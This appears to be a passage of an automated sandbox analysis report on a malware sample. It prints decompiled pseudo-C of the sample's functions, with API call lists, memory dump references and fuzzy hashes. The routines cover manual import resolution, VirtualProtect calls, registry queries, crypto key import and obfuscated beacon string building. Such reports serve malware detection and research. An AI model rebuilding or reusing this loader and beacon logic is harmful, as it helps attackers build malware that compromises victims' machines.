							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69
GetProcAddress.KERNEL32(?,00000000), ref: 6E051FDB

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
Instruction ID: 247a33f3aa2b283abb733da0036396871d792ef1f23ab563205e53c8ac8a547d
Opcode Fuzzy Hash: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
Instruction Fuzzy Hash: AB313471A0120ADFEB44CF99CA84BAEB7F4BF09344B104069D811E7341E774DA64CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A741D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xa7a294) == 0) {
						E00A71547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xa7a294) == 1) {
						_t10 = E00A74430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00a741d7
0x00a741d8
0x00a741db
0x00a7420d
0x00a7420f
0x00a7420f
0x00a741dd
0x00a741de
0x00a741f3
0x00a741fa
0x00a741fc
0x00a741fc
0x00a741fa
0x00a741de
0x00a74217

APIs

InterlockedIncrement.KERNEL32(00A7A294), ref: 00A741E5

Part of subcall function 00A74430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00A74445

InterlockedDecrement.KERNEL32(00A7A294), ref: 00A74205

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 5d70822242bad6384a169db10a34712943a5f0e193b847bbdb2dd95f96ef4d7a
Instruction ID: 6eb9450eab79da3529dcaae80cdc9bfe9832fc926fb8fec784a6abeee1c03b91
Opcode Fuzzy Hash: 5d70822242bad6384a169db10a34712943a5f0e193b847bbdb2dd95f96ef4d7a
Instruction Fuzzy Hash: 47E086313D4122A7C62157A49C08BDEA764BF59F85F00C414B84DE1063F720CCA2C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 6E051C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E051C12(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E051112( &_v8,  &_v12,  *0x6e0541cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E051BCB(_t22, _v8,  *0x6e0541cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6E051566(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e054190, 0, _v8);
				}
				return _t25;
			}

APIs

StrStrIA.KERNELBASE(00000000,6E051810,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C69
HeapFree.KERNEL32(00000000,?,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C83

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
Instruction ID: 3cc8f4539aeacf67c67bfc5bc59ee2263e406133ad668edc347705e37db3ad55
Opcode Fuzzy Hash: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
Instruction Fuzzy Hash: 64018476900915BB9B00CEE5CE54FDF7BFDEB89640F100161E601E7244D731DE159BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A74BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00A74BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xa7a2d0; // 0x4aed5a8
				_t4 = _t15 + 0xa7b394; // 0x556893c
				_t20 = _t4;
				_t6 = _t15 + 0xa7b124; // 0x650047
				_t17 = E00A77471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00A74C7C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00a74c09
0x00a74c0b
0x00a74c12
0x00a74c13
0x00a74c14
0x00a74c15
0x00a74c1b
0x00a74c20
0x00a74c20
0x00a74c2a
0x00a74c3c
0x00a74c43
0x00a74c72
0x00a74c45
0x00a74c4a
0x00a74c6f
0x00a74c4c
0x00a74c4f
0x00a74c56
0x00a74c61
0x00a74c58
0x00a74c5b
0x00a74c5b
0x00a74c65
0x00a74c65
0x00a74c4a
0x00a74c79

APIs

Part of subcall function 00A77471: SysFreeString.OLEAUT32(?), ref: 00A77550

Part of subcall function 00A74C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A777C1,004F0053,00000000,?), ref: 00A74C85
Part of subcall function 00A74C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A777C1,004F0053,00000000,?), ref: 00A74CAF
Part of subcall function 00A74C7C: memset.NTDLL ref: 00A74CC3

SysFreeString.OLEAUT32(00000000), ref: 00A74C65

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: c78353c0d15ace8950d71798e96092cb488a16c26734e8e18a7686e9c425a980
Instruction ID: b9abb3d46e8eb784b56ef7fe4e0f69bed56eee237d7e5212f2201562114c250e
Opcode Fuzzy Hash: c78353c0d15ace8950d71798e96092cb488a16c26734e8e18a7686e9c425a980
Instruction Fuzzy Hash: 87015A32501029BFEB12ABA8CD44DAEBBB9FB48710F00C565EA59E6021D3709A519791

Uniqueness

Uniqueness Score: -1.00%

Function 6E051236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E051236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e0541cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4);
				_t18 = E6E051AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E0514DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E051F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E051030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E05136A(_t42);
					L8:
					return _t29;
				}
			}

APIs

Part of subcall function 6E051AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43

Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,6E051280,?,?,?,?,?,6E051280,?,?,?,?,?,?,00000002), ref: 6E05150B
Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E05153E

Part of subcall function 6E051F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69

Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
Part of subcall function 6E051030: GetLastError.KERNEL32 ref: 6E0510E4

GetLastError.KERNEL32(?,?), ref: 6E0512B4

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: f52aa438a766c335b5414470e7fe2c81a9ec8cca932a9dcab5885dee210a2292
Instruction ID: d774ba9ea69c9063aeeb1874a9291d248ae7b30bea0963dfb6b4ed83fd706814
Opcode Fuzzy Hash: f52aa438a766c335b5414470e7fe2c81a9ec8cca932a9dcab5885dee210a2292
Instruction Fuzzy Hash: 3D110876600B056BD7119EE9CE80FDB77BCAF583447040959E901D7745E7B0ED2A87A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A730AD, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A730AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00A74BFF(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00A75419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xa7a290, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x00a730b5
0x00a7310a
0x00a7310f
0x00a730b7
0x00a730d1
0x00a730d5
0x00a730da
0x00a730dc
0x00a730ec
0x00a730f8
0x00a730de
0x00a730de
0x00a730e1
0x00a730e6
0x00a730e6
0x00a730dc
0x00a730d5
0x00a73115

APIs

Part of subcall function 00A75419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00A72115,3D00A790,80000002,00A77319,00000000,00A77319,?,65696C43,80000002), ref: 00A7545B
Part of subcall function 00A75419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00A72115,3D00A790,80000002,00A77319,00000000,00A77319,?,65696C43), ref: 00A75480
Part of subcall function 00A75419: RegCloseKey.ADVAPI32(80000002,?,00A72115,3D00A790,80000002,00A77319,00000000,00A77319,?,65696C43,80000002,00000000,?), ref: 00A754B0

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00A74A79,?,004F0053,05569338,00000000,?), ref: 00A730F8

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: c5de7fbb9af70e189806e0a1b87fb51943c2965e736417dc8701b5c6a08011eb
Instruction ID: a48a7ceea5dc2afa06810016f80c97c364c38ba8404de1f10170b4a4a2b9cbe4
Opcode Fuzzy Hash: c5de7fbb9af70e189806e0a1b87fb51943c2965e736417dc8701b5c6a08011eb
Instruction Fuzzy Hash: F4014632240249FBCF129F84CC02FAA3B7AEB94350F56C029FA1D8A161D631DA21EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A71AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A71AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00A735A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00A75C4E(_a8 + _a8);
					if(_t21 != 0) {
						E00A74502(_a4, _t21, _t23);
					}
					E00A72A03(_a4);
				}
				return _t21;
			}

0x00a71af9
0x00a71b00
0x00a71b02
0x00a71b11
0x00a71b18
0x00a71b27
0x00a71b2b
0x00a71b32
0x00a71b32
0x00a71b3a
0x00a71b3f
0x00a71b44

APIs

lstrlen.KERNEL32(00000000,00000000,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A71B02

Part of subcall function 00A735A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00A71B16,00000001,00A76301,00000000), ref: 00A735D9
Part of subcall function 00A735A1: memcpy.NTDLL(00A71B16,00A76301,00000010,?,?,?,00A71B16,00000001,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000), ref: 00A735F2
Part of subcall function 00A735A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00A7361B
Part of subcall function 00A735A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00A73633
Part of subcall function 00A735A1: memcpy.NTDLL(00000000,00000000,05569630,00000010), ref: 00A73685

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: bc4980bf3eb9eb69196766b51580061fdd1cee22a0f88a07f5048ad8a43c152c
Instruction ID: 0e191242013cbc5ac57fcbc5cf432351daa35a2fa16b70a64259926014920092
Opcode Fuzzy Hash: bc4980bf3eb9eb69196766b51580061fdd1cee22a0f88a07f5048ad8a43c152c
Instruction Fuzzy Hash: EFF0DA76100508BACF12AF69DD01DEB7FADEF853A0B01C022BD1D8A111EA71DA559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A75872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A75872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00a75872
0x00a7587f
0x00a75880
0x00a75881
0x00a75888
0x00a758b6
0x00a758b7
0x00a758ba
0x00a758c0
0x00000000
0x00000000
0x00a7589f
0x00a758a9
0x00a758b0
0x00000000
0x00a758a1
0x00a758a4
0x00a758c4
0x00a758a6
0x00a758a6
0x00000000
0x00a758a6
0x00a758a4
0x00a758cb
0x00a758d1
0x00a758d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00A758BA

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e228daa87f14fe70f106c7ee188cb7998945a1c799d8d54b81bc7aee3e9e8ad8
Instruction ID: 21ffbdad220922170f0ec668e0c44eb915d93e8e852b6aed0cf3fe1efad30e09
Opcode Fuzzy Hash: e228daa87f14fe70f106c7ee188cb7998945a1c799d8d54b81bc7aee3e9e8ad8
Instruction Fuzzy Hash: F3F0EC76D01618EFDB00DBA4C888AEDB7B8EF05305F14C4AAE506A7240D7B45B84DF56

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A76124, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00A76124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xa7a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xa7a018; // 0x785c6176
					asm("bswap eax");
					_t32 =  *0xa7a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xa7a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xa7a00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0xa7a2d0; // 0x4aed5a8
					_t2 = _t35 + 0xa7b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0xa7a02c,  *0xa7a004, _t110);
					_t38 = E00A7271A();
					_t39 =  *0xa7a2d0; // 0x4aed5a8
					_t3 = _t39 + 0xa7b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xa7a2d0; // 0x4aed5a8
						_t7 = _t92 + 0xa7b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00A72956(_t99);
					_t44 =  *0xa7a2d0; // 0x4aed5a8
					_t9 = _t44 + 0xa7b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xa7a2d0; // 0x4aed5a8
					_t11 = _t48 + 0xa7b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xa7a328; // 0x55695b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xa7a2d0; // 0x4aed5a8
						_t13 = _t88 + 0xa7b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xa7a37c; // 0x5569630
					_a28 = E00A75741(0xa7a00a, _t105 + 4);
					_t55 =  *0xa7a318; // 0x55695e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xa7a2d0; // 0x4aed5a8
						_t16 = _t84 + 0xa7b8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xa7a314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xa7a2d0; // 0x4aed5a8
						_t18 = _t81 + 0xa7b8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xa7a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00A71A51(GetTickCount());
							_t62 =  *0xa7a37c; // 0x5569630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xa7a37c; // 0x5569630
							__imp__(_t66 + 0x40);
							_t68 =  *0xa7a37c; // 0x5569630
							_t115 = E00A75AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xa792cc);
								_push(_t115);
								_t108 = E00A72829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00A73B46(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00A72813();
									}
									HeapFree( *0xa7a290, 0, _v24);
								}
								HeapFree( *0xa7a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xa7a290, _t107, _t98);
						}
						HeapFree( *0xa7a290, _t107, _a20);
					}
					HeapFree( *0xa7a290, _t107, _t117);
				}
				return _v16;
			}

0x00a76124
0x00a76138
0x00a7613a
0x00a76148
0x00a7614c
0x00a76154
0x00a7615c
0x00a7615c
0x00a7615e
0x00a7616a
0x00a76179
0x00a7617e
0x00a76181
0x00a76186
0x00a76189
0x00a7618e
0x00a76191
0x00a7619d
0x00a761aa
0x00a761ac
0x00a761b2
0x00a761b7
0x00a761c2
0x00a761c4
0x00a761c7
0x00a761cd
0x00a761cf
0x00a761d8
0x00a761e3
0x00a761e5
0x00a761e8
0x00a761e8
0x00a761ea
0x00a761f1
0x00a761f6
0x00a76203
0x00a76205
0x00a7620a
0x00a76218
0x00a7621a
0x00a7621f
0x00a76224
0x00a76227
0x00a7622c
0x00a76237
0x00a76239
0x00a7623c
0x00a7623c
0x00a7623e
0x00a76251
0x00a76255
0x00a7625a
0x00a7625e
0x00a76261
0x00a76266
0x00a76271
0x00a76273
0x00a76276
0x00a76276
0x00a76278
0x00a7627f
0x00a76282
0x00a76287
0x00a76291
0x00a76293
0x00a7629a
0x00a762b2
0x00a762b6
0x00a762c2
0x00a762c7
0x00a762d0
0x00a762e1
0x00a762e5
0x00a762ee
0x00a762f4
0x00a76301
0x00a7630e
0x00a76314
0x00a7631c
0x00a76322
0x00a76328
0x00a7632c
0x00a76330
0x00a76336
0x00a7633a
0x00a76341
0x00a76348
0x00a7634c
0x00a76357
0x00a7635e
0x00a76362
0x00a7636b
0x00a7636b
0x00a7637c
0x00a7637c
0x00a7638b
0x00a76391
0x00a76391
0x00a7639b
0x00a7639b
0x00a763ac
0x00a763ac
0x00a763ba
0x00a763ba
0x00a763ca

APIs

